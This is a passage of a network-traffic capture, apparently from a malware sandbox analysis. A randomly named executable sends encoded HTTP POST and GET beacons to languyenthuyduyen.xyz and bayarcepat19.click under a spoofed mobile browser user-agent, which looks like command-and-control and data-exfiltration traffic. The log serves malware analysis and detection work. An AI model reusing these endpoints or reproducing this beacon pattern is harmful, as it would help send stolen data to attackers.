                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                7192.168.11.3049828103.255.237.233806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:06.408952951 CEST3771OUTPOST /zxna/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.languyenthuyduyen.xyz
                                                                                                                                                                Referer: http://www.languyenthuyduyen.xyz/zxna/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 65 36 69 35 4f 78 55 41 37 53 66 79 4d 59 32 67 4e 68 34 2f 46 30 71 7a 78 43 31 42 6d 47 33 4d 47 2b 35 4c 2f 64 4a 65 75 78 76 4f 44 67 4a 59 2b 65 59 64 38 30 39 43 71 31 41 2f 41 59 63 31 32 70 77 68 56 2f 66 51 64 78 62 43 33 77 74 37 45 37 77 47 69 52 30 5a 5a 6e 4f 31 64 6d 7a 4c 66 70 55 37 79 77 4c 62 56 67 76 42 4b 72 71 59 62 34 79 2b 44 75 45 5a 76 63 5a 35 76 4a 63 6e 2f 4a 69 41 63 63 72 37 46 77 53 51 54 38 6c 63 36 76 34 68 33 46 79 76 79 56 41 4f 44 30 49 78 44 49 43 4a 31 6a 35 79 6b 5a 53 37 6a 45 63 44 7a 78 71 64 55 46 6a 74 78 54 43 79 79 2f 6c 56 73 67 4e 58 70 78 78 59 43 35 78 5a 45 4c 50 41 4e 5a 31 75 6e 36 73 39 47 6b 36 43 31 2f 6e 6f 62 6a 61 52 74 59 79 35 47 51 2b 64 74 52 4c 44 37 65 6f 53 34 54 58 72 70 71 56 4f 30 4f 2b 47 42 38 68 48 30 71 2f 30 5a 65 67 63 34 59 52 6b 4d 57 46 64 78 63 35 33 59 77 4f 76 68 49 7a 43 2f 42 62 66 37 79 4c 50 78 37 33 62 7a 39 2f 70 2f 6a 75 59 73 34 62 56 49 6c 54 72 52 4b 6d 4c 50 71 32 31 75 74 68 4f 5a 47 71 6d 61 4f [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=e6i5OxUA7SfyMY2gNh4/F0qzxC1BmG3MG+5L/dJeuxvODgJY+eYd809Cq1A/AYc12pwhV/fQdxbC3wt7E7wGiR0ZZnO1dmzLfpU7ywLbVgvBKrqYb4y+DuEZvcZ5vJcn/JiAccr7FwSQT8lc6v4h3FyvyVAOD0IxDICJ1j5ykZS7jEcDzxqdUFjtxTCyy/lVsgNXpxxYC5xZELPANZ1un6s9Gk6C1/nobjaRtYy5GQ+dtRLD7eoS4TXrpqVO0O+GB8hH0q/0Zegc4YRkMWFdxc53YwOvhIzC/Bbf7yLPx73bz9/p/juYs4bVIlTrRKmLPq21uthOZGqmaOOMx+h2PrLJ7iPAtavXsJpwVZNCpcAC+9KgdVaKPTtPwge2aQhVtmO/thP7B4XeQyArrpwx6GbyEf5ncGxX3jwXe9FRaMk1DR4tvkbmQwXd3dlIuks2u98WZesuBc47iRtrtNxXnQDz67wmDXPRKxGd6N+5gl4RuWvbPa+fkVPh2rcjge0ohAeipWBPrb/IRP6w2/Smy4x7QT3am5/mQiFcx5g843NwjbYfLzG7QbvVLkryqLbdJlapleKKzyxLxPW6cINT/aaNKG0aHa5FXoPY5OLl/z/Jv2f7pC3ASujYcaYuH9OITRORaKGCGFKgh42ipycPiUnzRkl44pBiVgjPjajaESJ0kHX4MIxy/VUM3QieGI5FwPY/9YPTnjamXS5cz85V10QW7MPGY85svwxKoP4W1679m9ev+n2f123mhF6ek0u+9IDP1faZH5ky7LI6eGRA70+oVKdsW3SDQCBBxhNKm/BsMFA/l/nO6LsFKKFIbg+dJtvAjUVU1iASXp2w7ws7KjDTdbp6KHuptEQr9AyLKXgjJ4i6QM8e+jSmlSMMGA5rxtRfWFAYYHSghYn70VC1i8juj9o4mwnCXCbuWsSaVMo4nxvd/647Zl5knEPBNHgpRtaNS3V/iORclB5nkejDcwpOW+Dp8GIAmb2G2+EYGJoHk6qG [TRUNCATED]
                                                                                                                                                                Oct 9, 2024 13:03:06.776392937 CEST959INHTTP/1.1 302 Found
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:06 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 683
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                8192.168.11.3049829103.255.237.233806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:09.307612896 CEST355OUTGET /zxna/?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4= HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.languyenthuyduyen.xyz
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:03:09.672271967 CEST1104INHTTP/1.1 302 Found
                                                                                                                                                                Server: openresty
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:09 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 683
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                Location: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?9X=EvKH2xeP-DpP307P&nhl=T4KZNGow8hyHZ/2VdCpkOUvznzx121WAOLhD3akGih7YK2UBiYRo2lJdrH1gL64cuqcjDePyZUHX/QJDU8k+qCwrYmvEQGfXWN0kwHy8MBDYStPNdJHxaZ4=
                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 [TRUNCATED]
                                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                9192.168.11.3049830104.21.77.69806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:14.910942078 CEST625OUTPOST /x7ji/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.bayarcepat19.click
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.bayarcepat19.click
                                                                                                                                                                Referer: http://www.bayarcepat19.click/x7ji/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 59 5a 2f 59 55 66 77 6d 4c 41 32 6c 4a 50 68 69 6f 64 52 6b 58 73 38 4c 45 5a 2b 2b 6d 30 56 33 46 53 75 66 37 6e 44 38 33 66 39 38 2f 50 79 2b 51 76 52 36 74 72 4c 6d 64 72 61 63 46 41 6a 6f 51 61 45 34 7a 59 6e 75 50 4c 39 2b 55 50 71 2b 5a 57 6c 69 33 4c 2b 2f 37 61 59 4f 32 74 57 71 50 77 6c 72 6a 75 61 7a 4b 42 79 4e 6c 4e 54 53 65 63 7a 31 78 2f 4f 69 6f 36 69 77 36 2b 46 4a 6a 48 71 57 7a 4a 6f 65 5a 63 77 4b 64 6f 70 63 78 59 4d 44 66 71 69 37 7a 6e 7a 7a 75 44 4a 48 73 79 30 4f 7a 35 4c 33 4d 32 72 39 78 6e 55 41 4e 70 71 55 45 2b 36 6a 50 4d 58 43 67 43 4f 57 62 77 3d 3d
                                                                                                                                                                Data Ascii: nhl=YZ/YUfwmLA2lJPhiodRkXs8LEZ++m0V3FSuf7nD83f98/Py+QvR6trLmdracFAjoQaE4zYnuPL9+UPq+ZWli3L+/7aYO2tWqPwlrjuazKByNlNTSecz1x/Oio6iw6+FJjHqWzJoeZcwKdopcxYMDfqi7znzzuDJHsy0Oz5L3M2r9xnUANpqUE+6jPMXCgCOWbw==
                                                                                                                                                                Oct 9, 2024 13:03:15.016858101 CEST820INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:14 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 167
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                Expires: Wed, 09 Oct 2024 12:03:14 GMT
                                                                                                                                                                Location: https://www.bayarcepat19.click/x7ji/
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oIXNRd1umUVT8MuTBl9DuAg6GKNX1Zct88NKyjS0gK61bjcOvXK99koxicQg98XYPBlXnIaySd4yIhvAjrp54Pu%2FbVg836HRZUnHClEjdj4JcV5oqo5UXrNr9CMnTNmQZo1HJhGV37ur"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8cfde20e7bd40f8b-EWR
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                10192.168.11.3049831104.21.77.69806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:17.540601015 CEST645OUTPOST /x7ji/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.bayarcepat19.click
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.bayarcepat19.click
                                                                                                                                                                Referer: http://www.bayarcepat19.click/x7ji/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 59 5a 2f 59 55 66 77 6d 4c 41 32 6c 50 72 6c 69 6c 65 35 6b 47 63 38 55 59 70 2b 2b 7a 6b 56 7a 46 53 71 66 37 6d 48 53 33 4d 4a 38 38 76 69 2b 52 75 52 36 75 72 4c 6d 46 37 61 56 61 51 6a 7a 51 62 35 46 7a 61 7a 75 50 4c 42 2b 55 4b 4f 2b 59 6e 6c 6c 74 37 2b 35 7a 36 59 41 79 74 57 71 50 77 6c 72 6a 75 4f 56 4b 48 61 4e 6c 39 44 53 66 39 7a 30 74 76 4f 6c 74 36 69 77 6f 4f 45 41 6a 48 71 4f 7a 4c 64 37 5a 66 49 4b 64 74 4e 63 78 4e 67 63 52 71 69 48 33 6e 79 48 2b 69 6b 4b 67 68 77 6c 7a 65 58 70 45 30 2b 41 39 51 6c 61 51 71 65 57 58 65 47 4f 54 4e 36 71 69 41 50 4e 47 2f 67 44 62 32 44 46 6f 49 31 4e 33 75 62 54 7a 70 6a 38 53 34 30 3d
                                                                                                                                                                Data Ascii: nhl=YZ/YUfwmLA2lPrlile5kGc8UYp++zkVzFSqf7mHS3MJ88vi+RuR6urLmF7aVaQjzQb5FzazuPLB+UKO+Ynllt7+5z6YAytWqPwlrjuOVKHaNl9DSf9z0tvOlt6iwoOEAjHqOzLd7ZfIKdtNcxNgcRqiH3nyH+ikKghwlzeXpE0+A9QlaQqeWXeGOTN6qiAPNG/gDb2DFoI1N3ubTzpj8S40=
                                                                                                                                                                Oct 9, 2024 13:03:17.652224064 CEST828INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:17 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 167
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                Expires: Wed, 09 Oct 2024 12:03:17 GMT
                                                                                                                                                                Location: https://www.bayarcepat19.click/x7ji/
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAOwH7hJE2dp2p0J4M5%2FBjuxfcKiRog8rZzcNLNz5JjTwquGDGyV%2FczC5JnNz%2FHuuZpFDiSOBCDEqkba5cFvvGHYqH0W2RRBlFbwsBHx6LkLKNegKQEa7mKkjS1Sm%2Br677T%2FDiGtAroZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8cfde21eee9f8cd4-EWR
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                11192.168.11.3049832104.21.77.69806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:20.179485083 CEST1289OUTPOST /x7ji/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.bayarcepat19.click
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.bayarcepat19.click
                                                                                                                                                                Referer: http://www.bayarcepat19.click/x7ji/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 59 5a 2f 59 55 66 77 6d 4c 41 32 6c 50 72 6c 69 6c 65 35 6b 47 63 38 55 59 70 2b 2b 7a 6b 56 7a 46 53 71 66 37 6d 48 53 33 4e 78 38 38 64 61 2b 51 4e 35 36 76 72 4c 6d 4d 62 61 59 61 51 69 6a 51 62 68 42 7a 61 76 45 50 4e 46 2b 56 73 43 2b 66 54 52 6c 6a 4c 2b 35 78 36 59 42 32 74 58 6f 50 78 56 76 6a 75 65 56 4b 48 61 4e 6c 2f 4c 53 66 73 7a 30 2b 66 4f 69 6f 36 6a 78 36 2b 45 73 6a 47 43 65 7a 4c 59 4f 5a 63 34 4b 64 2b 6c 63 32 37 30 63 52 71 69 48 36 48 79 47 2b 69 6f 4c 67 68 6f 78 7a 61 72 35 45 45 61 41 75 68 56 41 46 59 47 4a 45 63 61 51 65 65 4f 67 6a 52 6a 37 41 6f 68 69 52 45 54 43 70 4a 4a 61 76 34 66 58 68 4a 4c 57 42 63 34 49 7a 76 69 47 52 53 54 56 2f 66 52 62 55 72 48 47 74 52 6f 6d 63 58 4f 69 6c 51 46 55 61 33 4a 51 67 4b 43 55 51 77 4c 64 32 43 72 5a 2b 76 44 2b 66 48 45 47 38 34 63 6b 63 30 38 41 57 53 70 43 54 45 76 61 31 33 73 38 7a 48 38 4d 55 76 71 6c 47 62 77 33 36 57 2b 6b 37 6a 64 71 33 76 44 6b 74 70 46 43 77 36 63 4d 75 30 70 32 69 5a 69 6f 77 39 36 50 49 65 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=YZ/YUfwmLA2lPrlile5kGc8UYp++zkVzFSqf7mHS3Nx88da+QN56vrLmMbaYaQijQbhBzavEPNF+VsC+fTRljL+5x6YB2tXoPxVvjueVKHaNl/LSfsz0+fOio6jx6+EsjGCezLYOZc4Kd+lc270cRqiH6HyG+ioLghoxzar5EEaAuhVAFYGJEcaQeeOgjRj7AohiRETCpJJav4fXhJLWBc4IzviGRSTV/fRbUrHGtRomcXOilQFUa3JQgKCUQwLd2CrZ+vD+fHEG84ckc08AWSpCTEva13s8zH8MUvqlGbw36W+k7jdq3vDktpFCw6cMu0p2iZiow96PIeI/a2decenF4G0mMdBsWhGBOwiICI7hYY7LLeauTTuHih3SOKZUCIBdE+RIWQYkyzRcuJOZHkLt/BUYtAiE4QuH7m+PDNuMWLvNZtpcKJHpCGFjIwp2yHqwLpMtV6S7KuC3n6V8R3EDORFA7NLYhSociOD/CCdXSXJJGn4Kr7jerpxbE6GdaPPz5rArrlSI9LH5lrqFLZnDzlVeLMsIx8At1pkr/E1alWDGHhtOkQs069+voxK34kKBo8KtVs5kc49pA3LQesTOaW6IEavzgLT1HZgEMY3E/NI/SmYrlxgjcO+Kivpwyzvsx6d+mffJ5Wx8qKNI8XgItN36MHMFnvEAt+KmCZw+NlO3hV3L9gUZAvxoUib1xKnpJIbc+hDC/xq3AO6n+TuWUF0UwozHA5wHb9XlzpEiO3zb2ouf1ZaLwEfwQucLXzCf4Gmenpr6Mlls0fFcftt9BqHDQ7DyVCJEKmBYlXegIP3YO2M7xHfzjSgwhBq02agyh8bDqJthkW0IxcyEKII5M8s
                                                                                                                                                                Oct 9, 2024 13:03:20.179537058 CEST2473OUTData Raw: 56 34 68 31 6e 4d 73 6d 61 73 51 46 72 7a 70 6d 6f 33 73 33 68 6a 69 56 31 78 42 6d 7a 6c 4e 7a 4d 48 73 2f 31 72 35 48 37 64 52 75 63 6d 6a 6f 54 75 2b 45 34 69 34 46 63 51 38 58 6b 64 53 4c 2f 45 43 4b 5a 43 6d 39 4b 41 6b 2b 49 31 79 35 4c 71
                                                                                                                                                                Data Ascii: V4h1nMsmasQFrzpmo3s3hjiV1xBmzlNzMHs/1r5H7dRucmjoTu+E4i4FcQ8XkdSL/ECKZCm9KAk+I1y5LqAFlktAe0U8JYRFl+nfPCSfk2nXaUuhCbldQ30cR0cVx5gYC9Ldt+GQbg5UvAU3eEznQUZjvPwfVN3LrUlEklqvkLQN7T8/th1W79U6LIrPOKh5zWTIH6W6jv4ITS7/r+ShTkT+/HhtUnCyeMD6jAba8XYhBirrpEM
                                                                                                                                                                Oct 9, 2024 13:03:20.286434889 CEST856INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:20 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 167
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                Expires: Wed, 09 Oct 2024 12:03:20 GMT
                                                                                                                                                                Location: https://www.bayarcepat19.click/x7ji/
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A%2FlCbDMB%2Fej0mLBMv%2FYMVpqLRIYbDoDckeg5nP9KHAJ756LE%2FgdIM4cuj4A665sH4RUNcgAMTfRyCeNE8pnQy2LwZ8FSG41o7QgzxhaALVCQ3R5giii3lhEPTnmHqDc6YRUFktG5iyAY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8cfde22f6eb332e2-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                12192.168.11.3049833104.21.77.69806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:03:22.800280094 CEST352OUTGET /x7ji/?nhl=VbX4XoU1axPwTLIf98pUGPIzQL60g31CACrHzmj3o8Yh1t/lPrcBk6uAM4jdHwr2Bp5gqY7NYKc3aa2dAjtLrrS76KgS6f/xOF9OiJ7sHgK1x6zEV9Cyr40=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.bayarcepat19.click
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:03:22.910089970 CEST995INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:03:22 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 167
                                                                                                                                                                Connection: close
                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                Expires: Wed, 09 Oct 2024 12:03:22 GMT
